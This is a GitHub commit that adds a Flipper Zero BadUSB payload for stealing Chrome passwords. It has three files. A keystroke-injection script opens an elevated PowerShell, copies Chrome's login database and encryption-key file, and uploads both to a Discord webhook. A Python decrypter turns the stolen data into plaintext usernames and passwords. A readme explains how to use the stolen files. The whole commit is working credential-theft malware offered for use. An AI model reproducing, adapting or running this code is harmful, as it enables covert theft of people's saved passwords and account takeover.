STRLCPY/UNC0V3R3D_FlipperZero-BadUSB

Add files via upload
Jonas committed with GitHub 1 year ago

8c6165e3

1 parent 3165a186

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

BadUsb-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/chrome_passwords_discord.txt

1	+	REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
2	+	REM Description: Copies the chrome login file and sends it to a discord webhook.
3	+	REM Version: 1.0
4	+	REM Category: Passwords
5	+	DELAY 500
6	+	WINDOWS d
7	+	DELAY 500
8	+	WINDOWS r
9	+	DELAY 500
10	+	STRING powershell Start-Process powershell -Verb runAs
11	+	ENTER
12	+	DELAY 800
13	+	LEFTARROW
14	+	ENTER
15	+	DELAY 800
16	+	STRING $hookurl = "webhook url here"
17	+	ENTER
18	+	DELAY 300
19	+	STRING function Upload-Discord {[CmdletBinding()] param([parameter(Position=0,Mandatory=$False)][string]$file,[parameter(Position=1,Mandatory=$False)][string]$text) $Body = @{'username' = $env:username; 'content' = $text}; if (-not ([string]::IsNullOrEmpty($text))){Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body \| ConvertTo-Json)}; if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}}; $sourceFile = $env:LOCALAPPDATA+'\Google\Chrome\User Data\\Default\\Login Data'; $outputFile = "c:\output.txt"; Copy-Item $sourceFile $outputFile; Upload-Discord -file $outputFile -text ":)"; Remove-Item $outputFile
20	+	ENTER
21	+	DELAY 1000
22	+	STRING $sourceFile = $env:LOCALAPPDATA+'\Google\Chrome\User Data\\Local State'; $outputFile = "c:\key.txt"; Copy-Item $sourceFile $outputFile; Upload-Discord -file $outputFile -text "Key-File"; Remove-Item $outputFile
23	+	ENTER
24	+	DELAY 200
25	+	STRING exit
26	+	ENTER

■ ■ ■ ■ ■ ■

BadUsb-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/decrypter.py

1	+	import os
2	+	import json
3	+	import base64
4	+	import sqlite3
5	+	import win32crypt
6	+	from Crypto.Cipher import AES
7	+	import shutil
8	+	from datetime import timezone, datetime, timedelta
9	+
10	+	def get_chrome_datetime(chromedate):
11	+	return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)
12	+
13	+	def get_encryption_key():
14	+	local_state_path = "path to key"
15	+	with open(local_state_path, "r", encoding="utf-8") as f:
16	+	local_state = f.read()
17	+	local_state = json.loads(local_state)
18	+
19	+	key_b64 = local_state["os_crypt"]["encrypted_key"]
20	+	key = base64.b64decode(key_b64)[5:] # remove 'DPAPI' prefix
21	+	return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
22	+
23	+	def decrypt_password(password, key):
24	+	try:
25	+	# extract initialization vector (IV) and encrypted password
26	+	iv = password[3:15]
27	+	encrypted_password = password[15:]
28	+
29	+	# create a cipher object using the key and IV
30	+	cipher = AES.new(key, AES.MODE_GCM, iv)
31	+
32	+	# decrypt the password
33	+	return cipher.decrypt(encrypted_password)[:-16].decode()
34	+	except Exception:
35	+	# fallback to Windows Data Protection API (DPAPI)
36	+	try:
37	+	return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
38	+	except Exception:
39	+	return ""
40	+
41	+	def main():
42	+	# get the encryption key
43	+	key = get_encryption_key()
44	+
45	+	# get the path to the Chrome login database
46	+	db_path = "path to encrypted file"
47	+
48	+	# create a copy of the login database
49	+	filename = "ChromeData.db"
50	+	shutil.copyfile(db_path, filename)
51	+
52	+	# connect to the copy of the database
53	+	db = sqlite3.connect(filename)
54	+	cursor = db.cursor()
55	+
56	+	# get the login data
57	+	cursor.execute("SELECT origin_url, action_url, username_value, password_value, date_created, date_last_used FROM logins ORDER BY date_created")
58	+	for row in cursor.fetchall():
59	+	origin_url = row[0]
60	+	action_url = row[1]
61	+	username = row[2]
62	+	password = decrypt_password(row[3], key)
63	+	date_created = row[4]
64	+	date_last_used = row[5]
65	+
66	+	if username or password:
67	+	print(f"Origin URL: {origin_url}")
68	+	print(f"Action URL: {action_url}")
69	+	print(f"Username: {username}")
70	+	print(f"Password: {password}")
71	+	else:
72	+	continue
73	+	if date_created != 86400000000 and date_created:
74	+	print(f"Creation date: {str(get_chrome_datetime(date_created))}")
75	+	if date_last_used != 86400000000 and date_last_used:
76	+	print(f"Last Used: {str(get_chrome_datetime(date_last_used))}")
77	+	print("="*50)
78	+	cursor.close()
79	+	db.close()
80	+	try:
81	+	os.remove(filename)
82	+	except Exception:
83	+	pass
84	+
85	+	if __name__ == "__main__":
86	+	main()

■ ■ ■ ■ ■ ■

BadUsb-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/readme.md

1	+
2	+	# chrome_passwords_discord
3	+	Grabs the "key" and "login data" file for google chrome and sends them to a discord webhook. To decrypt please read below.
4	+
5	+	## How to use?
6	+
7	+	Well this script is kind of plug and play. AFter the two files ("encryped passwords" and "key.txt") got sent to your webhook, you will have to decrypt the passwords.
8	+
9	+	To do this, I have coded a python program that will use the grabbed "key" to decrypt the passwords.
10	+
11	+	In the python file, you will have to change 2 paths:
12	+
13	+	Line 14: ("path to key") insert the filepath to the key txt file on your pc.
14	+
15	+	Line 46: ("path to encrypted file") insert the filepath to the encrypted login file on your pc.
16	+
17	+
18	+	## Features
19	+
20	+	- open powershell
21	+	- grab 2 files
22	+	- send files to webhook
23	+
24	+	## Feedback
25	+
26	+	If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
27	+
28	+
29	+
30	+
31	+
32	+
33	+	## Support
34	+
35	+	For support, contact me via Discord "UNC0V3R3D#8662".
36	+
37	+
38	+	## Meta
39	+
40	+
41	+	- If you want to sponsor me on Patreon, the link is on my profile.
42	+
43	+
44	+

Add files via upload